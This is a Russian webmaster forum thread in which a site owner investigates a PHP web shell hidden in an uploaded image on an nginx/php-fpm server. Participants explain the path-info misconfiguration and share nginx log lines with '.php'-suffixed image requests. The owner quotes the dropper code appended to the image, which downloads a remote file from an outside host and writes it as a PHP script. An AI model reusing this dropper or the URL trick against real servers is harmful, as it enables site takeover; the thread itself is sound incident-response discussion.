- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как удалить плохие SEO-ссылки и очистить ссылочную массу сайта
Применяем отклонение ссылок
Сервис Rookee
В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах
Это на 45% больше, чем в 2022 году
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Да, спасибо, есть код, файл пока удалил от греха подальше. Я так понимаю это шелл, только как его можно вызывать, если это png-картинка?
В некоторых конфигурациях можно вызвать.
Не похоже на шелл, но похоже на тест исполнения. Шелл залили бы потом после проверки. А может даже и залили в другой url.
Вам самим стоит проверить как настроен сервер и исполняет ли этот код:
Снова создайте такой же файл png в том же каталоге с содержимым
123<?php phpinfo(); ?>
Скачайте файл качалкой по тому самому адресу. Просмотреть из браузера его очевидно не получится.
Убедитесь, что php-код внутри скачанного файла не заменился на результат выполнения php.
Убери обработку php из upload
Это вообще-то вебмастера в детском саде уже должны знать
Не похоже на шелл, но похоже на тест исполнения.
Это шелл самый настоящий, я просто привел часть кода, если кому интересно прикрепляю его код.
Убери обработку php из upload
Я это уже убрал, но только вчера, а заливка шелла состоялась гораздо раньше.
Это вообще-то вебмастера в детском саде уже должны знать
Может быть сис-админы? :)
Советую прочитать: http://habrahabr.ru/blogs/sysadm/100961/
У вас скорее всего то же самое.
у меня именно nginx + php-fpm, но cgi.fix_pathinfo было 1 - это как я понимаю дает возможность делать такие трюки.
Но есть довольно много способов неправильно настроить вебсервер. Лучше проверить на практике.
Кстати, попробуйте на короткое время эту настройку включить. Разве не интересно узнать, удалось ли им запустить шелл ?
Снова создайте такой же файл png в том же каталоге с содержимым
123<?php phpinfo(); ?>
Если открывать через браузер, выдает:
Если скачать этот файл и просмотреть, то так и остается 123<?php phpinfo(); ?>. Но я же говорю - сейчас php там не выполняется, но тогда точно выполнялось.
Reise добавил 20.11.2011 в 23:46
Разве не интересно узнать, удалось ли им запустить шелл ?
интересно, так и сделаю :)
Правда сейчас как я понимаю уже надо 2 настройки: cgi.fix_pathinfo=1 в /etc/php5/fpm/php.ini и убрать отдельный локейшен uploads из конфига nginx, чтобы php там выполнялся.
Reise добавил 21.11.2011 в 00:04
Кстати, попробуйте на короткое время эту настройку включить. Разве не интересно узнать, удалось ли им запустить шелл ?
Проверил. Результаты не порадовали.
Достаточно не запрещать обработку php в папке uploads - и по урлу /uploads/fotos/foto_110011.png/1.php срабатывает шелл и открывается файлменеджер.
Причем по урл-у /uploads/fotos/foto_110011.png благополучно открывается картинка.
И что интересно, это никак не зависит от настройки cgi.fix_pathinfo.
П.С. Вот блеать хакеры - руки отрывал бы за такое...
Reise добавил 21.11.2011 в 00:09
Советую прочитать: http://habrahabr.ru/blogs/sysadm/100961/
Спасибо, уже читаю.
Нашел такие строчки в логах nginx:
Какие будут мысли, что это, попытки взлома?
У меня в еррор логах и не такое есть, по интернету ходят боты, которые сканирует сервера на наличие определенных движков, потом видимо массово используя уязвимость пропатчивают сайты своим кодом и гребут трафик, в то время как вебмастер даже не догадывается что что-то изменилось на сайте. Кошмар короче.
У вас логе написан запрос к файлу 1.php, посмотрите у вас есть такой скрипт на сайте? Возможно все-таки стоит немного покопаться, может быть действительно что-то там происходит у вас.
/uploads/fotos/foto_107953.jpg/.php
Если вы действительно используете nginx кажется кто-то пытается использовать уязвимость связанную с настройкой этого вебсервера в связке с пхп.
Вот ссылка на статью, в которой кажется ваш случай http://habrahabr.ru/blogs/sysadm/100961/
Извиняюсь, не заметил что выше уже кто-то кинул ссылку.
потом видимо массово используя уязвимость пропатчивают сайты своим кодом и гребут трафик, в то время как вебмастер даже не догадывается что что-то изменилось на сайте. Кошмар короче.
Вы знаете, на этом сервере действительно падает постепенно траф практически на всех сайтах. Причину установить не могу, тем более позиции на месте. С вами можно как-то связаться, может у вас есть какие-то подходы к обнаружению сабжа. За помощь естественно готов заплатить.
У вас логе написан запрос к файлу 1.php, посмотрите у вас есть такой скрипт на сайте?
сейчас там его нет, но не факт что был раньше и его уже удалили. Да и вообще при таком раскладе отлично срабатывал шелл вшитый в картинку - я проверял, так что другого скрипта и не надо.
Если вы действительно используете nginx кажется кто-то пытается использовать уязвимость связанную с настройкой этого вебсервера в связке с пхп.
Вот ссылка на статью, в которой кажется ваш случай http://habrahabr.ru/blogs/sysadm/100961/
Да, советы прочитал, подправил конфиги. Но конечно гарантии нет, что если уязвимость уже используется, какие-то манипуляции ее перекроют.
Reise добавил 21.11.2011 в 03:40
Вот еще интересная последовательность запросов:
95.32.2.11 - - [07/Oct/2011:19:35:22 +0200] "GET /favicon.ico/.php HTTP/1.1" 200 330 "-" "-"
95.32.2.11 - - [07/Oct/2011:19:37:24 +0200] "GET /favicon.ico/.php HTTP/1.1" 200 122 "-" "Mozilla/5.0 (Windows NT 6.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1"
95.32.2.11 - - [07/Oct/2011:19:38:22 +0200] "GET /uploads/fotos/foto_107953.jpg/.php HTTP/1.1" 200 534 "-" "Mozilla/5.0 (Windows NT 6.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1"
95.32.2.11 - - [07/Oct/2011:19:38:27 +0200] "GET /uploads/fotos/1234567.php HTTP/1.1" 200 145777 "-" "Mozilla/5.0 (Windows NT 6.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1"
Обратите внимание на размер ответа - каждый раз разный, чтобы это значило?
При это к картинке foto_107953.jpg дописан код:
$file = file_get_contents('http://lbest-vrn.ru/6666.txt');^M
$brd = fopen('1234567.php','w+');^M
$write = fwrite($brd, $file);^M
?>
Я это уже убрал, но только вчера, а заливка шелла состоялась гораздо раньше.
Может быть сис-админы? :)
Нет
Сисадмины должны знать как настроить сервер чтоб у таких вот горе вебмастеров его не порутали